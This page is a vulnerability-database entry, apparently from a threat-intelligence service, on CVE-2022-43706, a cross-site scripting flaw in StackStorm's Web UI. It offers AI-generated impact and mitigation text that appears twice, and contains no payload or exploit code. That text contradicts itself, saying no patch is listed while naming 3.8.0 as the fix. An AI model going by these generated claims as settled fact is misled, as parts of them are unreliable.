CVE-2022-43706: n/a in n/a
Cross-site scripting (XSS) vulnerability in the Web UI of StackStorm versions prior to 3.8.0 allowed logged in users with write access to pack rules to inject arbitrary script or HTML that may be executed in Web UI for other logged in users.
AI Analysis
Technical Summary
CVE-2022-43706 is a cross-site scripting (XSS) vulnerability identified in the Web UI component of StackStorm, an automation platform used for event-driven orchestration and workflow automation. This vulnerability affects versions prior to 3.8.0. The flaw allows authenticated users with write access to pack rules—configuration elements that define automation triggers and actions—to inject arbitrary script or HTML code. When other logged-in users access the Web UI, the injected malicious code may execute in their browsers. The vulnerability is classified as a reflected/stored XSS (CWE-79), which can lead to session hijacking, unauthorized actions, or data exposure within the context of the affected application. The CVSS v3.1 base score is 5.4 (medium severity), reflecting that exploitation requires network access, low attack complexity, privileges with write access, and user interaction (the victim must be logged in and view the malicious content). The scope is changed (S:C), indicating that the vulnerability can affect resources beyond the initially vulnerable component. No known exploits in the wild have been reported, and no official patches or vendor-specific product details are provided in the source information. The vulnerability primarily impacts environments where StackStorm is deployed with multiple users having write permissions to pack rules and where the Web UI is accessible to multiple authenticated users.
Potential Impact
For European organizations using StackStorm, particularly those employing it for critical automation workflows, this vulnerability poses a risk of unauthorized script execution within the Web UI. An attacker with write access to pack rules could inject malicious scripts that execute in the browsers of other authenticated users, potentially leading to session hijacking, privilege escalation, or unauthorized command execution within the StackStorm environment. This can compromise the integrity of automation workflows, disrupt operational processes, and expose sensitive configuration or operational data. Organizations in sectors such as finance, manufacturing, telecommunications, and critical infrastructure—where automation platforms like StackStorm are commonly used—may face operational disruptions or data breaches. The medium severity score suggests that while the vulnerability is not trivially exploitable by unauthenticated attackers, the impact on confidentiality and integrity is significant enough to warrant prompt remediation. Given the collaborative nature of StackStorm usage, the risk increases in environments with multiple administrators or operators with write permissions. The absence of known exploits reduces immediate risk but does not eliminate the potential for targeted attacks, especially in high-value environments.
Mitigation Recommendations
To mitigate this vulnerability, European organizations should: 1) Upgrade StackStorm to version 3.8.0 or later, where the vulnerability is fixed. If immediate upgrade is not feasible, implement strict access controls to limit write permissions to pack rules only to highly trusted users. 2) Conduct a thorough audit of user roles and permissions within StackStorm to ensure the principle of least privilege is enforced, minimizing the number of users who can modify pack rules. 3) Implement Web UI input validation and output encoding controls where possible, to sanitize user inputs and prevent script injection. 4) Monitor StackStorm logs and user activity for unusual changes to pack rules or unexpected Web UI behavior. 5) Educate users to recognize suspicious activity or unexpected UI behavior that could indicate exploitation attempts. 6) If feasible, restrict Web UI access to trusted networks or via VPN to reduce exposure. 7) Consider deploying Web Application Firewalls (WAFs) with custom rules to detect and block XSS payloads targeting the StackStorm Web UI. These steps go beyond generic advice by focusing on role-based access control tightening, monitoring, and network-level protections tailored to StackStorm deployments.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Belgium, Italy
CVE-2022-43706: n/a in n/a
Description
Cross-site scripting (XSS) vulnerability in the Web UI of StackStorm versions prior to 3.8.0 allowed logged in users with write access to pack rules to inject arbitrary script or HTML that may be executed in Web UI for other logged in users.
AI-Powered Analysis
Technical Analysis
CVE-2022-43706 is a cross-site scripting (XSS) vulnerability identified in the Web UI component of StackStorm, an automation platform used for event-driven orchestration and workflow automation. This vulnerability affects versions prior to 3.8.0. The flaw allows authenticated users with write access to pack rules—configuration elements that define automation triggers and actions—to inject arbitrary script or HTML code. When other logged-in users access the Web UI, the injected malicious code may execute in their browsers. The vulnerability is classified as a reflected/stored XSS (CWE-79), which can lead to session hijacking, unauthorized actions, or data exposure within the context of the affected application. The CVSS v3.1 base score is 5.4 (medium severity), reflecting that exploitation requires network access, low attack complexity, privileges with write access, and user interaction (the victim must be logged in and view the malicious content). The scope is changed (S:C), indicating that the vulnerability can affect resources beyond the initially vulnerable component. No known exploits in the wild have been reported, and no official patches or vendor-specific product details are provided in the source information. The vulnerability primarily impacts environments where StackStorm is deployed with multiple users having write permissions to pack rules and where the Web UI is accessible to multiple authenticated users.
Potential Impact
For European organizations using StackStorm, particularly those employing it for critical automation workflows, this vulnerability poses a risk of unauthorized script execution within the Web UI. An attacker with write access to pack rules could inject malicious scripts that execute in the browsers of other authenticated users, potentially leading to session hijacking, privilege escalation, or unauthorized command execution within the StackStorm environment. This can compromise the integrity of automation workflows, disrupt operational processes, and expose sensitive configuration or operational data. Organizations in sectors such as finance, manufacturing, telecommunications, and critical infrastructure—where automation platforms like StackStorm are commonly used—may face operational disruptions or data breaches. The medium severity score suggests that while the vulnerability is not trivially exploitable by unauthenticated attackers, the impact on confidentiality and integrity is significant enough to warrant prompt remediation. Given the collaborative nature of StackStorm usage, the risk increases in environments with multiple administrators or operators with write permissions. The absence of known exploits reduces immediate risk but does not eliminate the potential for targeted attacks, especially in high-value environments.
Mitigation Recommendations
To mitigate this vulnerability, European organizations should: 1) Upgrade StackStorm to version 3.8.0 or later, where the vulnerability is fixed. If immediate upgrade is not feasible, implement strict access controls to limit write permissions to pack rules only to highly trusted users. 2) Conduct a thorough audit of user roles and permissions within StackStorm to ensure the principle of least privilege is enforced, minimizing the number of users who can modify pack rules. 3) Implement Web UI input validation and output encoding controls where possible, to sanitize user inputs and prevent script injection. 4) Monitor StackStorm logs and user activity for unusual changes to pack rules or unexpected Web UI behavior. 5) Educate users to recognize suspicious activity or unexpected UI behavior that could indicate exploitation attempts. 6) If feasible, restrict Web UI access to trusted networks or via VPN to reduce exposure. 7) Consider deploying Web Application Firewalls (WAFs) with custom rules to detect and block XSS payloads targeting the StackStorm Web UI. These steps go beyond generic advice by focusing on role-based access control tightening, monitoring, and network-level protections tailored to StackStorm deployments.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- mitre
- Date Reserved
- 2022-10-24T00:00:00.000Z
- Cisa Enriched
- true
Threat ID: 682d9840c4522896dcbf1385
Added to database: 5/21/2025, 9:09:20 AM
Last enriched: 6/24/2025, 3:41:44 AM
Last updated: 7/26/2025, 4:52:47 AM
Views: 7
Related Threats
CVE-2025-53187: CWE-94 Improper Control of Generation of Code ('Code Injection') in ABB ASPECT
HighCVE-2025-54063: CWE-94: Improper Control of Generation of Code ('Code Injection') in CherryHQ cherry-studio
HighCVE-2025-1500: CWE-434 Unrestricted Upload of File with Dangerous Type in IBM Maximo Application Suite
MediumCVE-2025-1403: CWE-502 Deserialization of Untrusted Data in IBM Qiskit SDK
HighCVE-2025-0161: CWE-94 Improper Control of Generation of Code ('Code Injection') in IBM Security Verify Access
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.